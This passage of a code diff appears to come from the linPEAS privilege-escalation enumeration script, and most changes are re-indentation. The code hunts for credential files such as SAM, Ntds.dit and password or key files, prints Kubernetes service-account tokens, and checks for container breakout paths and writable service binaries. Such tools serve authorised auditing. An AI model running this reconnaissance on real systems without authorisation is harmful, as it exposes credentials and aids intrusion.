"$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) + PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) + PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) + PSTORAGE_DATABASE=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) + PSTORAGE_BACKUPS=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "backup$|backups$" | sort | uniq | head -n 70) + PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) ##### POST SERACH VARIABLES ##### @@ -1245,7 +1245,7 @@ fi -if echo $CHECKS | grep -q system_information; +if echo $CHECKS | grep -q system_information; then print_title "System Information" ########################################### #-------------) System Info (-------------# @@ -1434,11 +1434,11 @@ else fi fi -echo'' -echo'' +echo '' +echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -if echo $CHECKS | grep -q container; +if echo $CHECKS | grep -q container; then print_title "Container" ############################################## #---------------) Containers (---------------# @@ -1458,90 +1458,90 @@ podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then -echo_no + echo_no else -containerCounts="" -if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi -if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi -if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi -if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi -echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," -# List any running containers -if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi -if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi -if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi -if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi + containerCounts="" + if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi + if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi + if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi + if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi + echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," + + # List any running containers + if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi + if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi + if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi + if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi fi #If docker if echo "$containerType" | grep -qi "docker"; then -print_2title "Docker Container details" -inDockerGroup -print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," -print_list "Looking and enumerating Docker Sockets\n"$NC -enumerateDockerSockets -print_list "Docker version .................$NC$dockerVersion" -checkDockerVersionExploits -print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," -print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," -if [ "$inContainer" ]; then - checkDockerRootless - print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," -fi -if df -h | grep docker; then - print_2title "Docker Overlays" - df -h | grep docker -fi -fi - -if [ "$inContainer" ]; then -echo "" -print_2title "Container & breakout enumeration" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" -print_list "Container ID ...................$NC $(cat /etc/hostname)" -if echo "$containerType" | grep -qi "docker"; then - print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" -fi -if echo "$containerType" | grep -qi "kubernetes"; then - print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" - print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" -fi - -checkContainerExploits -print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," -echo "" - -print_2title "Container Capabilities" -capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" -echo "" - -print_2title "Privilege Mode" -if [ -x "$(command -v fdisk)" ]; then - if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then - echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," - else - echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," + print_2title "Docker Container details" + inDockerGroup + print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Looking and enumerating Docker Sockets\n"$NC + enumerateDockerSockets + print_list "Docker version .................$NC$dockerVersion" + checkDockerVersionExploits + print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," + if [ "$inContainer" ]; then + checkDockerRootless + print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," + fi + if df -h | grep docker; then + print_2title "Docker Overlays" + df -h | grep docker fi -else - echo_not_found -fi -echo "" - -print_2title "Interesting Files Mounted" -(mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" -echo "" - -print_2title "Possible Entrypoints" -ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq -echo "" fi +if [ "$inContainer" ]; then + echo "" + print_2title "Container & breakout enumeration" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" + print_list "Container ID ...................$NC $(cat /etc/hostname)" + if echo "$containerType" | grep -qi "docker"; then + print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" + fi + if echo "$containerType" | grep -qi "kubernetes"; then + print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" + print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" + fi + + checkContainerExploits + print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," + echo "" + + print_2title "Container Capabilities" + capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" + echo "" + + print_2title "Privilege Mode" + if [ -x "$(command -v fdisk)" ]; then + if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then + echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," + else + echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," + fi + else + echo_not_found + fi + echo "" + + print_2title "Interesting Files Mounted" + (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" + echo "" + + print_2title "Possible Entrypoints" + ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq + echo "" fi -echo'' -echo'' +fi +echo '' +echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -if echo $CHECKS | grep -q available_software; +if echo $CHECKS | grep -q available_software; then print_title "Available Software" ########################################### #---------) Available Software (----------# @@ -1558,15 +1558,15 @@ print_2title "Installed Compiler" echo "" if [ "$(command -v pkg 2>/dev/null)" ]; then -print_2title "Vulnerable Packages" -pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" -echo "" + print_2title "Vulnerable Packages" + pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" + echo "" fi if [ "$(command -v brew 2>/dev/null)" ]; then -print_2title "Brew Installed Packages" -brew list -echo "" + print_2title "Brew Installed Packages" + brew list + echo "" fi if [ "$MACPEAS" ]; then @@ -1582,14 +1582,15 @@ system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" fi done - fi -echo'' -echo'' +fi +echo '' +echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -if echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets; +if echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets; then print_title "Processes, Crons, Timers, Services and Sockets" + #################################################### #-----) Processes & Cron & Services & Timers (-----# #################################################### @@ -1597,46 +1598,46 @@ print_title "Processes, Crons, Timers, Services and Sockets" #-- PCS) Cleaned proccesses print_2title "Cleaned processes" if [ "$NOUSEPS" ]; then -printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC + printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC fi print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" if [ "$NOUSEPS" ]; then -print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," -pslist=$(print_ps) + print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + pslist=$(print_ps) else -(ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do + (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then - cpid=$(echo "$psline" | awk '{print $2}') - caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" - if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then + cpid=$(echo "$psline" | awk '{print $2}') + caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" + if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" + fi fi - fi -done -pslist=$(ps auxwww) -echo "" + done + pslist=$(ps auxwww) + echo "" -#-- PCS) Binary processes permissions -print_2title "Binary processes permissions" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" -binW="IniTialiZZinnggg" -ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do + #-- PCS) Binary processes permissions + print_2title "Binary processes permissions" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" + binW="IniTialiZZinnggg" + ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do if [ -w "$bpath" ]; then - binW="$binW|$bpath" + binW="$binW|$bpath" fi -done -ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," + done + ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," fi echo "" #-- PCS) Files opened by processes belonging to other users if ! [ "$IAMROOT" ]; then -print_2title "Files opened by processes belonging to other users" -print_info "This is usually empty because of the lack of privileges to read other user processes information" -lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," -echo "" + print_2title "Files opened by processes belonging to other users" + print_info "This is usually empty because of the lack of privileges to read other user processes information" + lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + echo "" fi #-- PCS) Processes with credentials inside memory @@ -1652,11 +1653,11 @@ echo "" #-- PCS) Different processes 1 min if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then -print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" -temp_file=$(mktemp) -if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi -echo "" + print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" + temp_file=$(mktemp) + if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi + echo "" fi #-- PCS) Cron @@ -1674,42 +1675,42 @@ atq 2>/dev/null echo "" if [ "$MACPEAS" ]; then -print_2title "Third party LaunchAgents & LaunchDemons" -print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" -ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null -echo "" + print_2title "Third party LaunchAgents & LaunchDemons" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" + ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null + echo "" -print_2title "Writable System LaunchAgents & LaunchDemons" -find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do + print_2title "Writable System LaunchAgents & LaunchDemons" + find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do program="" program=$(defaults read "$f" Program 2>/dev/null) if ! [ "$program" ]; then - program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) + program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) fi if [ -w "$program" ]; then - echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; + echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi -done -echo "" + done + echo "" -print_2title "StartupItems" -print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" -ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null -echo "" + print_2title "StartupItems" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" + ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null + echo "" -print_2title "Login Items" -print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" -osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null -echo "" + print_2title "Login Items" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" + osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null + echo "" -print_2title "SPStartupItemDataType" -system_profiler SPStartupItemDataType -echo "" + print_2title "SPStartupItemDataType" + system_profiler SPStartupItemDataType + echo "" -print_2title "Emond scripts" -print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" -ls -l /private/var/db/emondClients -echo "" + print_2title "Emond scripts" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" + ls -l /private/var/db/emondClients + echo "" fi #-- PCS) Services @@ -1730,26 +1731,26 @@ echo "" print_2title "Analyzing .service files" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do -if [ ! -O "$s" ]; then #Remove services that belongs to the current user + if [ ! -O "$s" ]; then #Remove services that belongs to the current user if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" + echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" fi servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths printf "%s\n" "$servicebinpaths\n" | while read sp; do - if [ -w "$sp" ]; then + if [ -w "$sp" ]; then echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" - fi + fi done relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") if [ "$relpath1" ] || [ "$relpath2" ]; then - if [ "$WRITABLESYSTEMDPATH" ]; then + if [ "$WRITABLESYSTEMDPATH" ]; then echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; - else + else echo "$s is executing some relative path" + fi fi - fi -fi + fi done if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi echo "" @@ -1764,116 +1765,116 @@ echo "" print_2title "Analyzing .timer files" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do -if ! [ "$IAMROOT" ] && [ -w "$t" ]; then + if ! [ "$IAMROOT" ] && [ -w "$t" ]; then echo "$t" | sed -${E} "s,.*,${SED_RED},g" -fi -timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) -printf "%s\n" "$timerbinpaths" | while read tb; do + fi + timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) + printf "%s\n" "$timerbinpaths" | while read tb; do if [ -w "$tb" ]; then - echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" + echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" fi -done -#relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" -#for rp in "$relpath"; do -# echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" -#done + done + #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" + #for rp in "$relpath"; do + # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" + #done done echo "" #-- PSC) .socket files #TODO: .socket files in MACOS are folders if ! [ "$IAMROOT" ]; then -print_2title "Analyzing .socket files" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" -printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do + print_2title "Analyzing .socket files" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" + printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" + echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" fi socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') printf "%s\n" "$socketsbinpaths" | while read sb; do - if [ -w "$sb" ]; then + if [ -w "$sb" ]; then echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" - fi + fi done socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 